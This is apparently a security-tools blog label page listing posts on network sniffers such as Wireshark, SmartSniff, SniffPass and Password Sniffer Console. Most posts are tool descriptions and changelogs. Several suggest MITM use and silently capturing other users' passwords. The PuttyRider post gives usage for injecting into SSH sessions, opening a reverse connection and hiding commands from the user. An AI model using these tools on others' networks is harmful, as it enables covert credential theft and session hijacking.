Showing posts with label Sniffer. Show all posts

SmartSniff v2.16 - Capture TCP/IP packets on your network adapter

January 27, 2015 Capture, Capture TCP/IP, SmartSniff, Sniffer, Sniffing, TCP/IP Windows

SmartSniff is a network monitoring utility that allows you to capture TCP/IP packets that pass through your network adapter, and view the captured data as sequence of conversations between clients and servers. You can view the TCP/IP conversations in Ascii mode (for text-based protocols, like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for non-text base protocols, like DNS)

SmartSniff provides 3 methods for capturing TCP/IP packets :

Raw Sockets (Only for Windows 2000/XP or greater): Allows you to capture TCP/IP packets on your network without installing a capture driver. This method has some limitations and problems.
WinPcap Capture Driver: Allows you to capture TCP/IP packets on all Windows operating systems. (Windows 98/ME/NT/2000/XP/2003/Vista) In order to use it, you have to download and install WinPcap Capture Driver from this Web site. (WinPcap is a free open-source capture driver.)
This method is generally the preferred way to capture TCP/IP packets with SmartSniff, and it works better than the Raw Sockets method.
Microsoft Network Monitor Driver (Only for Windows 2000/XP/2003): Microsoft provides a free capture driver under Windows 2000/XP/2003 that can be used by SmartSniff, but this driver is not installed by default, and you have to manually install it, by using one of the following options:
- Option 1: Install it from the CD-ROM of Windows 2000/XP according to the instructions in Microsoft Web site
- Option 2 (XP Only) : Download and install the Windows XP Service Pack 2 Support Tools. One of the tools in this package is netcap.exe. When you run this tool in the first time, the Network Monitor Driver will automatically be installed on your system.
Microsoft Network Monitor Driver 3: Microsoft provides a new version of Microsoft Network Monitor driver (3.x) that is also supported under Windows 7/Vista/2008. Starting from version 1.60, SmartSniff can use this driver to capture the network traffic.
The new version of Microsoft Network Monitor (3.x) is available to download from Microsoft Web site.

System Requirements

SmartSniff can capture TCP/IP packets on any version of Windows operating system (Windows 98/ME/NT/2000/XP/2003/2008/Vista/7/8) as long as WinPcap capture driver is installed and works properly with your network adapter.

You can also use SmartSniff with the capture driver of Microsoft Network Monitor, if it's installed on your system.

Under Windows 2000/XP (or greater), SmartSniff also allows you to capture TCP/IP packets without installing any capture driver, by using 'Raw Sockets' method. However, this capture method has some limitations and problems:

Outgoing UDP and ICMP packets are not captured.
On Windows XP SP1 outgoing packets are not captured at all - Thanks to Microsoft's bug that appeared in SP1 update...
This bug was fixed on SP2 update, but under Vista, Microsoft returned back the outgoing packets bug of XP/SP1.
On Windows Vista/7/8: Be aware that Raw Sockets method doesn't work properly on all systems. It's not a bug in SmartSniff, but in the API of Windows operating system. If you only see the outgoing traffic, try to turn off Windows firewall, or add smsniff.exe to the allowed programs list of Windows firewall.

Download SmartSniff v2.16

Password Sniffer Console - Command-line Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords

January 19, 2015 Password Sniffer, Password Sniffer Console, Sniffer, Sniffing, Windows

Password Sniffer Console is the all-in-one command-line based Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on network for various protocols and instantly decodes the passwords.

Here is the list of supported protocols,

HTTP (BASIC authentication)
FTP
POP3
IMAP
SMTP

In addition to recovering your own lost passwords, you can use this tool in following scenarios,

Run it on Gateway System where all of your network's traffic pass through.
In MITM Attack, run it on middle system to capture the Passwords from target system.
On Multi-user System, run it under Administrator account to silently capture passwords for all the users.

It includes Installer which installs the Winpcap, network capture driver required for sniffing. For Windows 8, first you have to manually install Winpcap driver (in Windows 7 Compatibility mode) and then run our installer to install only Password Sniffer Console.

It is a very useful tool for penetration testers and being a command-line tool makes it suitable for automation.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Requirements

PasswordSnifferConsole requires Winpcap (http://www.winpcap.org) - industry standard packet capture library for Windows. By default latest version of Winpcap (as of this writing v4.1.2) is installed automatically during the installation of Password Sniffer Console.

However if you don't want it, you can uncheck it during installation and later install the latest version manually.

Download Password Sniffer Console

Hyperfox - HTTP and HTTPs Traffic Interceptor

January 12, 2015 HTTP, HTTPs, Hyperfox, Proxy, Sectools, Sniffer, Sniffing, Traffic Interceptor

Hyperfox is a security tool for proxying and recording HTTP and HTTPs communications on a LAN.

Hyperfox is capable of forging SSL certificates on the fly using a root CA certificate and its corresponding key (both provided by the user). If the target machine recognizes the root CA as trusted, then HTTPs traffic can be succesfully intercepted and recorded.

Hyperfox saves captured data to a SQLite database for later inspection and also provides a web interface for watching live traffic and downloading wire formatted messages.

Download Hyperfox

SniffPass - Password Monitoring/Sniffing Software (Web/FTP/Email)

January 07, 2015 Password Sniffer, Sectools, Sniffer, Sniffing, SniffPass, Windows

SniffPass is small password monitoring software that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords).

You can use this utility to recover lost Web/FTP/Email passwords.

Using SniffPass

In order to start using SniffPass, follow the instructions below:

Download and install the WinPcap capture driver or the Microsoft Network Monitor driver.
You can also try to capture without any driver installation, simply by using the 'Raw Socket' capture method, but you should be aware that this method doesn't work properly in many systems.
Run the executable file of SniffPass (SniffPass.exe).
From the File menu, select "Start Capture", or simply click the green play button in the toolbar. If it's the first time that you use SniffPass, you'll be asked to select the capture method and the network adapter that you want to use.
After you select the desired capture options, SniffPass listen to your network adapter, and display instantly any password that it find.
In order to verify that the password sniffing works in your system, go to the demo Web page at http://www.nirsoft.net/password_test and type 'demo' as user name and 'password' as the password. After typing the user name/password and clicking 'Ok', you should see a new line in the main window of SniffPass containing the user/password you typed.

Get passwords of another computer on your network ?

Many people ask me whether SniffPass is able to get passwords from another computer on the same network. So here's the answer. In order to grab the passwords from other network computers:

You must use a simple hub to connect your computers to the network. All modern switches and routers automatically filter the packets of the other computers, so the computer that runs SniffPass will never "see" the passwords of other computers when you use a switch or a router.
Your network card must be able to enter into 'Promiscuous Mode'.
You must use WinPCap or Network Monitor Driver as a capture method.
For wireless network: Most wireless network cards (or their device drivers) automatically filter the packets of other computers, so you won't be able the capture the passwords of ther computers. However, starting from Windows Vista/7, you can capture passwords of wireless networks that are not encrypted, by using Wifi Monitor Mode and Network Monitor Driver 3.x.
For more information about capturing from wireless networks , read this Blog post: How to capture data and passwords of unsecured wireless networks with SniffPass and SmartSniff

Command-Line Options

Command	Description
/NoCapDriver	Starts SniffPass without loading the WinPcap Capture Driver.
/NoReg	Starts SniffPass without loading/saving your settings to the Registry.

Download SniffPass

USBPcap - USB Packet capture for Windows (open-source USB Sniffer for Windows)

December 27, 2014 Sectools, Sniffer, Sniffing, USB, USB Sniffer, USBPcap, Windows

USBPcap is an open-source USB sniffer for Windows.

USB Packet capture for Windows Tour

Download USBPcap

PuttyRider - Hijack Putty sessions in order to sniff conversation and inject Linux commands

December 15, 2014 DLL Injection, Hijack Putty, Linux, PuTTY, PuttyRider, Sectools, Sniffer, Sniffing, Windows

PuttyRider injects a DLL into a running putty.exe process in order to sniff all communication and inject Linux commands on the remote server.

This can be useful in an internal penetration test when you already have access to a sysadmin’s machine who has a Putty session open to a Linux server. You can use PuttyRider to take control of the remote server using the existing SSH session.

The tool has been recently presented at Defcamp 2014 – a security conference in Romania.

Presentation slides: *http://defcamp.ro/dc14/AdrianFurtuna.pdf*

Examples
List existing Putty processes and their status (injected / not injected)

PuttyRider.exe -l

Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

PuttyRider.exe -x

Usage

Operation modes:
    -l      List the running Putty processes and their connections
    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also
    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found
    -x      Cleanup. Remove the DLL from all running Putty instances
    -d      Debug mode. Only works with -p mode
    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD
    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended
    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input
    !discon     Disconnect the main Putty window so it won't display anything
                This is useful to send commands without the user to notice
    !recon      Reconnect the Putty window to its normal operation mode
    CMD         Linux shell commands
    !exit       Terminate this connection
    !help       Display help for client connection

Download PuttyRider

WhoIsConnectedSniffer - Detect who is connected to your network without scanning

July 14, 2014 ARP, DHCP, mDNS, Network Discovery, Sniffer, UDP, WhoIsConnectedSniffer, Windows, WinpCap

WhoIsConnectedSniffer is a network discovery tool that listens to network packets on your network adapter using a capture driver (WinpCap or MS network monitor) and accumulates a list of computer and devices currently connected to your network. WhoIsConnectedSniffer uses various protocols to detect the computers connected to your network, including ARP, UDP, DHCP, mDNS, and BROWSER.

For every detected computer or device, the following information is displayed: (Some of the fields might be empty if the information cannot be found inside the packets) IP Address, MAC Address, name of the device/computer, description, Operating System, Network Adapter Company, IPv6 Address.

After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file.

Start Using WhoIsConnectedSniffer

Except of the capture driver, WhoIsConnectedSniffer doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - WhoIsConnectedSniffer.exe

After running WhoIsConnectedSniffer in the first time, you should choose the correct capture driver and the network adapter you want to use.

After you choose the desired capture driver and the network adapter, WhoIsConnectedSniffer starts to listen the packets on your network adapter and updates the main window when a device or computer is detected.

You have to wait from a few seconds to a few minutes until the first computers/devices appear on the main window of WhoIsConnectedSniffer.

After collecting the connected computers/devices information, you can easily export the list to tab-delimited/comma-delimited/xml/html file by selecting all items (Ctrl+A), and then using the 'Save Selected Items' option (Ctrl+S).

Protocols supported by WhoIsConnectedSniffer

ARP:WhoIsConnectedSniffer listens to this protocol to get the IP address and MAC address of computers and devices.
UDP:When a computer broadcasts a UDP packet to all other computers, WhoIsConnectedSniffer extracts from it the IP address and the MAC address.
DHCP:When a computer connects to the network, it usually sends a DHCP request. WhoIsConnectedSniffer uses this request to get the host name and IP address of the computer.
mDNS:This protocol is used on Linux and Mac OS systems. WhoIsConnectedSniffer uses it to get the host name and IP address of the computer, and also the operating system (on Linux)
BROWSER:This protocol is mainly used by Windows, but some Linux systems supports this protocol too. WhoIsConnectedSniffer uses it to get the name of the computer, description text of the computer, and the operating system.

Download WhoIsConnectedSniffer

Wireshark v1.10.8 - The world’s foremost network protocol analyzer

July 03, 2014 Linux, Mac, Network, Network Auditing Tool, Network Protocol Analyzer, Sniffer, Sniffing, Windows, Wireshark

Wireshark is the world’s foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Features

Wireshark has a rich feature set which includes the following:

Deep inspection of hundreds of protocols, with more being added all the time
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript®, CSV, or plain text

Changelog:

The following vulnerabilities have been fixed.

wnpa-sec-2014-07
The frame metadissector could crash. (Bug 9999, Bug 10030)
Versions affected: 1.10.0 to 1.10.7
CVE-2014-4020

The following bugs have been fixed:

VoIP flow graph crash upon opening. (Bug 9179)
Tshark with "-F pcap" still generates a pcapng file. (Bug 9991)
IPv6 Next Header 0x3d recognized as SHIM6. (Bug 9995)
Failed to export pdml on large pcap. (Bug 10081)
TCAP: set a fence on info column after calling sub dissector (Bug 10091)
Dissector bug in JSON protocol. (Bug 10115)
GSM RLC MAC: do not skip too many lines of the CSN_DESCR when the field is missing (Bug 10120)
Wireshark PEEKREMOTE incorrectly decoding QoS data packets from Cisco Sniffer APs. (Bug 10139)
IEEE 802.11: fix dissection of HT Capabilities (Bug 10166)

Download Wireshark

WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet

June 20, 2014 Sniffer, Sniffing, WebSiteSniffer, Windows

WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and total number of files for every file type (HTML, Text, Images, and so on)

Download WebSiteSniffer v1.41

WebCookiesSniffer - Capture Web site cookies

June 05, 2014 Capture Cookies, Cookies, EN, Sniffer, Sniffing, Web site cookies, WebCookiesSniffer, Windows

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Download WebCookiesSniffer

HTTPNetworkSniffer - Http Sniffer Utility

May 31, 2014 EN, Http Sniffer Utility, HTTPNetworkSniffer, Sniffer, Sniffing, Windows

HTTPNetworkSniffer is a packet sniffer tool that captures all HTTP requests/responses sent between the Web browser and the Web server and displays them in a simple table. For every HTTP request, the following information is displayed: Host Name, HTTP method (GET, POST, HEAD), URL Path, User Agent, Response Code, Response String, Content Type, Referer, Content Encoding, Transfer Encoding, Server Name, Content Length, Cookie String, and more...

You can easily select one or more HTTP information lines, and then export them to text/html/xml/csv file or copy them to the clipboard and then paste them into Excel.

Download HTTPNetworkSniffer

Wireshark v1.11.3 - The world’s foremost network protocol analyzer

April 30, 2014 EN, Linux, Mac, Network, Network Auditing Tool, Network Protocol Analyzer, Sniffer, Sniffing, Windows, Wireshark

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.11.3

New and Updated Features

The following features are new (or have been significantly updated) since version 1.11.1:

Qt port:
- The About dialog has been added
- The Capture Interfaces dialog has been added.
- The Decode As dialog has been added. It managed to swallow up the User Specified Decodes dialog as well.
- The Export PDU dialog has been added.
- Several SCTP dialogs have been added.
- The statistics tree (the backend for many Statistics and Telephony menu items) dialog has been added.
- The I/O Graph dialog has been added.
- French translation has updated.

The following features are new (or have been significantly updated) since version 1.11.1:

Mac OS X packaging has been improved.

The following features are new (or have been significantly updated) since version 1.11.0:

Dissector output may be encoded as UTF-8. This includes TShark output.
Qt port:
- The Follow Stream dialog now supports packet and TCP stream selection.
- A Flow Graph (sequence diagram) dialog has been added.
- The main window now respects geometry preferences.

The following features are new (or have been significantly updated) since version 1.10:

Wireshark now uses the Qt application framework. The new UI should provide a significantly better user experience, particularly on Mac OS X and Windows.
The Windows installer now uninstalls the previous version of Wireshark silently. You can still run the uninstaller manually beforehand if you wish to run it interactively.
Expert information is now filterable when the new API is in use.
The “Number” column shows related packets and protocol conversation spans (Qt only).
When manipulating packets with editcap using the -C <choplen> and/or -s <snaplen> options, it is now possible to also adjust the original frame length using the -L option.
You can now pass the -C <choplen> option to editcap multiple times, which allows you to chop bytes from the beginning of a packet as well as at the end of a packet in a single step.
You can now specify an optional offset to the -C option for editcap, which allows you to start chopping from that offset instead of from the absolute packet beginning or end.
“malformed” display filter has been renamed to “_ws.malformed”. A handful of other filters have been given the “_ws.” prefix to note they are Wireshark application specific filters and not dissector filters.

Download Wireshark v1.11.3

KisMAC - Free Sniffer/Scanner application for Mac OS X

April 20, 2014 EN, KisMAC, Mac, Scanner, Sniffer

KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning.

KisMAC supports many third party USB devices: Intersil Prism2, Ralink rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning.

The rest of this wiki assumes you are prepared for advanced topics and know what you are doing with your system.

Features

Reveals hidden / cloaked / closed SSIDs
Shows logged in clients (with MAC Addresses, IP addresses and signal strengths)
Mapping and GPS support
Can draw area maps of network coverage
PCAP import and export
Support for 802.11b/g
Different attacks against encrypted networks
Deauthentication attacks
AppleScript-able
Kismet drone support (capture from a Kismet drone)

Supported hardware chipsets

Apple AirPort and AirPort Extreme (dependent upon Apple's drivers)
Intersil Prism 2, 2.5, 3 USB devices
Ralink rt2570 and rt73 USB devices
Realtek RTL8187L USB (such as the Alfa AWUS036H, which does not work on Mac OS 10.6.7 or later)

Crypto support

Bruteforce attacks against LEAP, WPA and WEP
Weak scheduling attack against WEP
Newsham 21-bit attack against WEP

Download KisMAC

Passivedns - A network sniffer that logs all DNS server replies for use in a passive DNS setup

April 07, 2014 Collect DNS Records, DNS answer, EN, Linux, Passivedns, Sniffer

A tool to collect DNS records passively to aid Incident handling, Network Security Monitoring (NSM) and general digital forensics.

PassiveDNS sniffes traffic from an interface or reads a pcap-file and outputs the DNS-server answers to a log file. PassiveDNS can cache/aggregate duplicate DNS answers in-memory, limiting the amount of data in the logfile without loosing the essens in the DNS answer.

Example output from version 1.0.0->Current in the log file (/var/log/passivedns.log):

#timestamp||dns-client ||dns-server||RR class||Query||Query Type||Answer||TTL||Count
1322849924.408856||10.1.1.1||8.8.8.8||IN||upload.youtube.com.||A||74.125.43.117||46587||5
1322849924.408857||10.1.1.1||8.8.8.8||IN||upload.youtube.com.||A||74.125.43.116||420509||5
1322849924.408858||10.1.1.1||8.8.8.8||IN||www.adobe.com.||CNAME||www.wip4.adobe.com.||43200||8
1322849924.408859||10.1.1.1||8.8.8.8||IN||www.adobe.com.||A||193.104.215.61||43200||8
1322849924.408860||10.1.1.1||8.8.8.8||IN||i1.ytimg.com.||CNAME||ytimg.l.google.com.||43200||3
1322849924.408861||10.1.1.1||8.8.8.8||IN||clients1.google.com.||A||173.194.32.3||43200||2

Download Passivedns

DNSQuerySniffer - DNS Queries Sniffer

March 27, 2014 DNS, DNS Queries Sniffer, DNSQuerySniffer, EN, Sniffer, Sniffing, Windows

DNSQuerySniffer is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records.

You can easily export the DNS queries information to csv/tab-delimited/xml/html file, or copy the DNS queries to the clipboard, and then paste them into Excel or other spreadsheet application.

Download DNSQuerySniffer

[Mail Password Sniffer] Email Password Recovery and Sniffing Software

February 11, 2014 Email Password, Email Password Recovery, Email Password Sniffer, EN, Imap Password, Mail Password Sniffer, Pop3 Password, Smtp Password, Sniffer, Windows

Mail Password Sniffer is the free Email Password Sniffing and Recovery Software to recover mail account passwords passing through the network.

It automatically detects the Email authentication packets passing through network and decodes the passwords for all Mail Protocols including POP3, IMAP, SMTP.

It can recover mail account passwords from all the Email applications such as Outlook, Thunderbird, Foxmail etc. For each recovered Email Account, it displays Email Protocol, Server IP Address, Port, Username & Password.

This tool will give best results in following scenarios,

Run it on Gateway System where all of your network's traffic pass through.
In MITM Attack, run it on middle system to capture Email Passwords from target system.
On Multi-user System, run it under Administrator account to silently capture Email passwords for all the users.

It works on both 32-bit & 64-bit platforms starting from Windows XP to Windows 8.

Download Mail Password Sniffer v2.0

[Intercepter-ng] Sniffer de Red con SSLstrip para Android

January 22, 2014 Android, ES, Intercepter-Ng, Sniffer, Sniffing, SSLstrip

Intercepter-NG es una aplicación que nos permitirá capturas el tráfico de datos en la red local a la que estemos conectados. Esta herramienta tiene la funcionalidad de analizador de protocolos al más puro estilo Wireshark aunque con muchísimas menos opciones. Con Intercepter-ng podremos ver cookies de las diferentes conexiones que se realicen así como realizar ataques contra SSL con SSLStrip.

En RedesZone tenéis un completo manual de utilización de SSLstrip y cómo funciona exactamente para “descifrar” el tráfico SSL. La aplicación tiene varias pestañas para elegir el objetivo, iniciar el analizador de paquetes y ver todo el tráfico en detalle y también las cookies de las páginas web que la víctima ha visitado.

Lo primero que debemos hacer con esta aplicación es pulsar en el radar para escanear los posibles objetivos, una vez seleccionado el objetivo nos movemos por las pestañas para ir viendo las diferentes opciones que nos brinda esta aplicación.

Alguna de las utilidades es que nos permite recuperar la contraseña y los archivos que se transmitan en la red que estamos analizando.

Los requisitos que necesita esta aplicación son los siguientes:

Android 2.3.3 o superior
Ser root
Tener instalado Busybox

Fuente

Download Intercepter-ng

[Password Sniffer Spy v2.0] Tool to Sniff and Capture HTTP/FTP/POP3/SMTP/IMAP Passwords

January 20, 2014 Capture, EN, HTTP/FTP/POP3/SMTP/IMAP, Network Password, Password Capture, Password Sniffer, Password Sniffer Spy, Passwords, Sniffer, Windows

Password Sniffer Spy is the all-in-one Password Sniffing Tool to capture Email, Web and FTP login passwords passing through the network.

It automatically detects the login packets on network for various protocols and instantly decodes the passwords. Here is the list of supported protocols,

HTTP (BASIC authentication)
FTP
POP3
IMAP
SMTP

In addition to recovering your own lost passwords, you can use this tool in following scenarios,

Run it on Gateway System where all of your network's traffic pass through.
In MITM Attack, run it on middle system to capture the Passwords from target system.
On Multi-user System, run it under Administrator account to silently capture passwords for all the users.

Download Password Sniffer Spy v2.0

[Wireshark v1.10.0 RC2] The world’s foremost network protocol analyzer

May 23, 2013 EN, Linux, Sniffer, Sniffing, Windows, Wireshark

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.10.0 RC 2

Wireshark 1.10.0rc2 has been released. Installers for Windows, OS X, and source code are now available. This is the first release candidate for Wireshark 1.10.0.

New and Updated Features

The following features are new (or have been significantly updated) since version 1.8:

Wireshark on 32- and 64-bit Windows supports automatic updates.
The packet bytes view is faster.
You can now display a list of resolved host names in “hosts” format within Wireshark.
The wireless toolbar has been updated.
Wireshark on Linux does a better job of detecting interface addition and removal.
It is now possible to compare two fields in a display filter (for example: udp.srcport != udp.dstport). The two fields must be of the same type for this to work.
The Windows installers ship with WinPcap 4.1.3, which supports Windows 8.
USB type and product name support has been improved.
All Bluetooth profiles and protocols are now supported.
Wireshark now calculates HTTP response times and presents the result in a new field in the HTTP response. Links from the request’s frame to the response’s frame and vice-versa are also added.
The main welcome screen and status bar now display file sizes using strict SI prefixes instead of old-style binary prefixes.
Capinfos now prints human-readable statistics with SI suffixes by default.
It is now possible to open a referenced packet (such as the matched request or response packet) in a new window.
Tshark can now display only the hex/ascii packet data without requiring that the packet summary and/or packet details are also displayed. If you want the old behavior, use -Px instead of just -x.
Wireshark can be compiled using GTK+ 3.
The Wireshark application icon, capture toolbar icons, and other icons have been updated.
Tshark’s filtering and multi-pass analysis have been reworked for consistency and in order to support dependent frame calculations during reassembly. See the man page descriptions for -2, -R, and -Y.
Tshark’s -G fields2 and -G fields3 options have been eliminated. The -G fields option now includes the 2 extra fields that -G fields3 previously provided, and the blurb information has been relegated to the last column since in many cases it is blank anyway.
Wireshark dropped the left-handed settings from the preferences. This is still configurable via the GTK settings (add “gtk-scrolled-window-placement = top-right” in the config file, which might be called /.gtkrc-2.0 or /.config/gtk-3.0/settings.ini).
Wireshark now ships with two global configuration files: Bluetooth, which contains coloring rules for Bluetooth and Classic, which contains the old-style coloring rules.

Full changelog: here

Download Wireshark v1.10.0 RC2

[Wireshark v1.8.7] The world’s foremost network protocol analyzer

May 20, 2013 EN, Linux, Sniffer, Sniffing, Windows, Wireshark

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Changelog v1.8.7

What’s New

Bug Fixes

The following vulnerabilities have been fixed.

wnpa-sec-2013-23The RELOAD dissector could go into an infinite loop. Discovered by Evan Jensen. (Bug 8364, (Bug 8546) Versions affected: 1.8.0 to 1.8.6.
CVE-2013-2486
CVE-2013-2487
wnpa-sec-2013-24The GTPv2 dissector could crash. (Bug 8493) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-25The ASN.1 BER dissector could crash. (Bug 8599) Versions affected: 1.8.0 to 1.8.6, 1.6.0 to 1.6.14.
wnpa-sec-2013-26The PPP CCP dissector could crash. (Bug 8638) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-27The DCP ETSI dissector could crash. Discovered by Evan Jensen. (Bug 8231, bug 8540, bug 8541) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-28The MPEG DSM-CC dissector could crash. (Bug 8481) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-29The Websocket dissector could crash. Discovered by Moshe Kaplan. (Bug 8448, Bug 8499) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-30The MySQL dissector could go into an infinite loop. Discovered by Moshe Kaplan. (Bug 8458) Versions affected: 1.8.0 to 1.8.6.
wnpa-sec-2013-31The ETCH dissector could go into a large loop. Discovered by Moshe Kaplan. (Bug 8464) Versions affected: 1.8.0 to 1.8.6.

The following bugs have been fixed:

The Windows installer and uninstaller does a better job of detecting running executables.
Library mismatch when compiling on a system with an older Wireshark version. (Bug 6011)
SNMP dissector bug: STATUS_INTEGER_DIVIDE_BY_ZERO. (Bug 7359)
A console window is never opened. (Bug 7755)
GSM_MAP show malformed Packets when two IMSI. (Bug 7882)
Fix include and libs search path when cross compiling. (Bug 7926)
PER dissector crash. (Bug 8197)
pcap-ng: name resolution block is not written to file on save. (Bug 8317)
Incorrect RTP statistics (Lost Packets indication not ok). (Bug 8321)
Decoding of GSM MAP E164 Digits. (Bug 8450)
Silent installer and uninstaller not silent. (Bug 8451)
Replace use of INCLUDES with AM_CPPFLAGS in all Makefiles to placate recent autotools. (Bug 8452)
Wifi details are not stored in the Decryption Key Management dialog (post 1.8.x). (Bug 8446)
IO Graph should not be limited to 100k points (NUM_IO_ITEMS). (Bug 8460)
geographical_description: hf_gsm_a_geo_loc_deg_of_long 24 bit field truncated to 23 bits. (Bug 8532)
IRC message with multiple params causes malformed packet exception. (Bug 8548)
Part of Ping Reply Message in ICMPv6 Reply Message is marked as “Malformed Packet”. (Bug 8554)
MP2T wiretap heuristic overriding ERF. (Bug 8556)
Cannot read content of Ran Information Application Error Rim Container. (Bug 8559)
Endian error and IP:Port error when decoding BT-DHT response message. (Bug 8572)
“ACE4_ADD_FILE/ACE4_ADD_SUBDIRECTORY” should be “ACE4_APPEND_DATA / ACE4_ADD_SUBDIRECTORY”. (Bug 8575)
wireshark crashes while displaying I/O Graph. (Bug 8583)
GTPv2 MM Context (UMTS Key, Quad, and Quint Decoded) incorrectly. (Bug 8596)
DTLS 1.2 uses wrong PRF. (Bug 8608)
RTP DTMF digits are no longer displayed in VoIP graph analysis. (Bug 8610)
Universal port not accepted in RSA Keys List window. (Bug 8618)
Wireshark Dissector bug with HSRP Version 2. (Bug 8622)
LISP control packet incorrectly identified as LISP data based when UDP source port is 4341. (Bug 8627)
Bad tcp checksum not detected. (Bug 8629)
AMR Frame Type uses wrong Value String. (Bug 8681)

New and Updated Features

There are no new features in this release.

New Protocol Support

There are no new protocols in this release.

Updated Protocol Support

AMR, ASN.1 BER, BAT, Bluetooth DHT, BSSGP, DTLS, E.164, Ericsson A-bis OML, GSM A, GSM MAP, HDFSDATA, ICMP, ICMPv6, ixveriwave, IRC, KDSP, LISP Data, MMS, NFS, OpenWire, PPP, RELOAD, RTP, SASP, SIP, SSL/TLS, TCP, UA3G

System Requirements

Using SniffPass

Get passwords of another computer on your network ?

Command-Line Options

Start Using WhoIsConnectedSniffer

Protocols supported by WhoIsConnectedSniffer

Features

Changelog v1.11.3

Features

Supported hardware chipsets

Crypto support

Changelog v1.10.0 RC 2

Changelog v1.8.7

Social Profiles

About Me

Blogger news

Các Chuyên Mục